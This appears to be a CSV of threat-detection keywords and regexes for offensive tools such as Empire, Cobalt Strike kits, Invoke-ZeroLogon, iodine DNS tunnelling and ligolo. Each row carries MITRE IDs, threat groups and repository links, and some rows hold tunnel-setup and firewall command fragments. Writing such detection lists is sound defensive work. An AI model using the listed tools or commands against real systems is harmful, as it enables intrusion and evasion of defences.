"*Invoke-WScriptBypassUAC*",".{0,1000}Invoke\-WScriptBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","49865"
"*Invoke-WScriptBypassUAC*",".{0,1000}Invoke\-WScriptBypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-WScriptBypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49866"
"*Invoke-WScriptBypassUAC.ps1*",".{0,1000}Invoke\-WScriptBypassUAC\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49867"
"*Invoke-WscriptElevate*",".{0,1000}Invoke\-WscriptElevate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-WScriptBypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49868"
"*Invoke-WsusConfigCheck*",".{0,1000}Invoke\-WsusConfigCheck.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49869"
"*Invoke-ZeroLogon*",".{0,1000}Invoke\-ZeroLogon.{0,1000}","offensive_tool_keyword","Invoke-ZeroLogon","Zerologon CVE exploitation","T1210 - T1212 - T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004","TA0001 - TA0004 - TA0005 - TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/BC-SECURITY/Invoke-ZeroLogon","1","1","N/A","N/A","N/A","3","216","41","2020-10-14T04:42:58Z","2020-09-17T05:01:46Z","49870"
"*Invoke-Zerologon*",".{0,1000}Invoke\-Zerologon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49871"
"*Invoke-ZeroLogon.ps1*",".{0,1000}Invoke\-ZeroLogon\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49872"
"*Invoking CreateSvcRpc (by @x86matthew)*",".{0,1000}Invoking\sCreateSvcRpc\s\(by\s\@x86matthew\).{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#content","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","49873"
"*Invoking CreateSvcRpc (by @x86matthew*",".{0,1000}Invoking\sCreateSvcRpc\s\(by\s\@x86matthew.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","49874"
"*io_dirtycow.c*",".{0,1000}io_dirtycow\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","49875"
"*io_dirtycow.so*",".{0,1000}io_dirtycow\.so.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","49876"
"*iodine -*",".{0,1000}iodine\s\-.{0,1000}","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49879"
"*iodine -f *",".{0,1000}iodine\s\-f\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49880"
"*iodine IP over DNS tunneling server*",".{0,1000}iodine\sIP\sover\sDNS\stunneling\sserver.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#content #linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49881"
"*iodine -v*",".{0,1000}iodine\s\-v.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49882"
"*iodined -*",".{0,1000}iodined\s\-.{0,1000}","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49883"
"*iodined -c*",".{0,1000}iodined\s\-c.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49884"
"*iodined -f *",".{0,1000}iodined\s\-f\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49885"
"*iodined -v*",".{0,1000}iodined\s\-v.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49886"
"*iodine-latest/*",".{0,1000}iodine\-latest\/.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49887"
"*iodine-latest-android.zip*",".{0,1000}iodine\-latest\-android\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49888"
"*iodine-latest-win32*",".{0,1000}iodine\-latest\-win32.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49889"
"*iodine-latest-windows*",".{0,1000}iodine\-latest\-windows.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49890"
"*iodine-server.service*",".{0,1000}iodine\-server\.service.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49891"
"*iodinetestingtesting*",".{0,1000}iodinetestingtesting.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49892"
"*iomoath/PowerShx*",".{0,1000}iomoath\/PowerShx.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","49894"
"*iomoath/SharpSpray*",".{0,1000}iomoath\/SharpSpray.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","49895"
"*ionided *",".{0,1000}ionided\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49897"
"*ionuttbara/windows-defender-remover*",".{0,1000}ionuttbara\/windows\-defender\-remover.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","49898"
"*ios7tojohn.pl*",".{0,1000}ios7tojohn\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","49899"
"*iox.exe fwd -r *",".{0,1000}iox\.exe\sfwd\s\-r\s.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","49900"
"*IOXIDResolver.py*",".{0,1000}IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","49901"
"*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49903"
"*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","49904"
"*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#linux","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","49905"
"*ip route add * dev ligolo*",".{0,1000}ip\sroute\sadd\s.{0,1000}\sdev\sligolo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49906"
"*ip route add * dev ligolo*",".{0,1000}ip\sroute\sadd\s.{0,1000}\sdev\sligolo.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#linux","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","49907"
"*ip tuntap add user * mode tun ligolo*",".{0,1000}ip\stuntap\sadd\suser\s.{0,1000}\smode\stun\sligolo.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#linux","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","49908"
"*ip tuntap add user root mode tun ligolo*",".{0,1000}ip\stuntap\sadd\suser\sroot\smode\stun\sligolo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49909"
"*IPeerToPeerService.*",".{0,1000}IPeerToPeerService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","49911"
"*IPfuscation.sln*",".{0,1000}IPfuscation\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","49912"
"*IPfuscation.vcxproj*",".{0,1000}IPfuscation\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","49913"
"*IPPrintC2.ps1*",".{0,1000}IPPrintC2\.ps1.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","49914"
"*IPPrintC2-main.zip*",".{0,1000}IPPrintC2\-main\.zip.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","49915"
"*ipSlav/DirtyCLR*",".{0,1000}ipSlav\/DirtyCLR.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","1","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","49922"
"*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *",".{0,1000}iptables\s\-\%c\sOUTPUT\s\-p\stcp\s\-d\s127\.0\.0\.1\s\-\-tcp\-flags\sRST\sRST\s\-j\sDROP\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","49924"
"*iptables -t nat -A REDSOCKS*",".{0,1000}iptables\s\-t\snat\s\-A\sREDSOCKS.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","49929"
